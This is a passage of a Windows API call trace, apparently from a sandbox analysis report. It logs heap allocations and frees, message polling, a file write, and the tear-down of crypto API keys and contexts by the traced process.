HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0258.042] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540f8 | out: hHeap=0x970000) returned 1 [0258.042] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515f8 | out: hHeap=0x970000) returned 1 [0258.042] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516e8 | out: hHeap=0x970000) returned 1 [0258.042] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51778 | out: hHeap=0x970000) returned 1 [0258.042] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51610 | out: hHeap=0x970000) returned 1 [0258.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51868 | out: hHeap=0x970000) returned 1 [0258.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518b0 | out: hHeap=0x970000) returned 1 [0258.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0258.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977c08 | out: hHeap=0x970000) returned 1 [0258.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0258.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51790 | out: hHeap=0x970000) returned 1 [0258.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515c8 | out: hHeap=0x970000) returned 1 [0258.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51640 | out: hHeap=0x970000) returned 1 [0258.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54530 | out: hHeap=0x970000) returned 1 [0258.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0258.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3bf0258 | out: hHeap=0x970000) returned 1 [0258.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0258.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0258.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0258.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54260 | out: hHeap=0x970000) returned 1 [0258.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0258.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0258.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0258.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54468 | out: hHeap=0x970000) returned 1 [0258.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0258.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0258.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977c68 | out: hHeap=0x970000) returned 1 [0258.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0258.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3bf0050 | out: hHeap=0x970000) returned 1 [0258.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0258.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51010 | out: hHeap=0x970000) returned 1 [0258.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0258.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0258.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54490 | out: hHeap=0x970000) returned 1 [0258.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0258.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544e0 | out: hHeap=0x970000) returned 1 [0258.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0258.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54170 | out: hHeap=0x970000) returned 1 [0258.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0258.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543a0 | out: hHeap=0x970000) returned 1 [0258.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0258.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54378 | out: hHeap=0x970000) returned 1 [0258.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0258.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0258.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0258.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54210 | out: hHeap=0x970000) returned 1 [0258.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978470 | out: hHeap=0x970000) returned 1 [0258.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0258.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0258.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0258.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0258.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54350 | out: hHeap=0x970000) returned 1 [0258.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3bf0680 | out: hHeap=0x970000) returned 1 [0258.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0258.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0258.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0258.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0258.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542d8 | out: hHeap=0x970000) returned 1 [0258.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0258.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0258.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0258.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0258.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0258.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0258.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e561a8 | out: hHeap=0x970000) returned 1 [0258.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0258.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: hHeap=0x970000) returned 1 [0258.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0258.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0258.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0258.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0258.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0258.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978270 | out: hHeap=0x970000) returned 1 [0258.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0258.046] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0258.046] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x200) returned 0x2e561a8 [0258.046] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3bf0888 | out: hHeap=0x970000) returned 1 [0258.046] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0258.046] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0258.046] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0258.046] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0258.046] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77788 [0258.046] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0258.046] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77788 | out: hHeap=0x970000) returned 1 [0258.046] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0258.046] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0258.046] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51010 [0258.046] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0258.046] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0258.046] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51070 [0258.046] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0258.046] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0258.046] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x200) returned 0x978270 [0258.046] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0258.046] WriteFile (in: hFile=0x2a0, lpBuffer=0x978270*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x978270*, lpNumberOfBytesWritten=0x8cf5e4*=0x200, lpOverlapped=0x0) returned 1 [0258.048] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51010 | out: hHeap=0x970000) returned 1 [0258.048] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978270 | out: hHeap=0x970000) returned 1 [0258.048] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0258.048] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0258.048] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0258.048] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0258.049] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0258.049] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0258.049] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0258.049] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e775c8 | out: hHeap=0x970000) returned 1 [0258.049] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77688 | out: hHeap=0x970000) returned 1 [0258.049] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0258.049] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0258.049] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0258.049] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69bc8 [0258.049] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0258.049] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0258.049] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0258.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0258.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0258.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511f0 [0258.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0258.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542d8 [0258.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0258.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0258.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51280 [0258.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51058 [0258.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0258.050] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0258.050] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0258.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0258.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0258.050] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0258.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0258.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0258.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0258.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0258.051] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0258.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0258.051] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2e513e8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0258.051] CryptDestroyKey (hKey=0xa87410) returned 1 [0258.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978270 [0258.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0258.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0258.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0258.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0258.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0258.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0258.051] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0258.051] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0258.052] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0258.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0258.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0258.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0258.052] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0258.052] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0258.052] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0258.052] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544e0 | out: hHeap=0x970000) returned 1 [0258.052] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0258.052] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0258.052] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0258.052] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55e68 | out: hHeap=0x970000) returned 1 [0258.052] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0258.052] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0258.053] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0258.053] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78bb8 | out: hHeap=0x970000) returned 1 [0258.053] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0258.053] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0258.053] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0258.053] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e559d0 | out: hHeap=0x970000) returned 1 [0258.053] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0258.053] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0258.053] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0258.053] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77788 | out: hHeap=0x970000) returned 1 [0258.053] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0258.053] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0258.053] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0258.053] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0258.053] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0258.054] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0258.054] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0258.054] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54260 | out: hHeap=0x970000) returned 1 [0258.054] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0258.054] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0258.054] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0258.054] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55b90 | out: hHeap=0x970000) returned 1 [0258.054] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0258.054] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0258.054] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0258.054] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0258.054] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0258.054] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0258.054] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0258.055] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55f48 | out: hHeap=0x970000) returned 1 [0258.055] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0258.055] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0258.055] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0258.055] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0258.055] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55f48 | out: hHeap=0x970000) returned 1 [0258.055] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0258.055] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0258.055] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0258.055] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54558 | out: hHeap=0x970000) returned 1 [0258.055] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0258.055] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0258.055] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0258.056] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0258.056] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x2e69c08, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0258.056] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0258.056] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54468 [0258.056] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c08 | out: hHeap=0x970000) returned 1 [0258.056] GetProcAddress (hModule=0x756e0000, lpProcName="CryptReleaseContext") returned 0x756ffbc0 [0258.057] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54468 | out: hHeap=0x970000) returned 1 [0258.057] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0258.057] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51070 [0258.057] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0258.057] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0258.057] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0258.057] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0258.057] HeapFree (in: hHeap=0x970000, 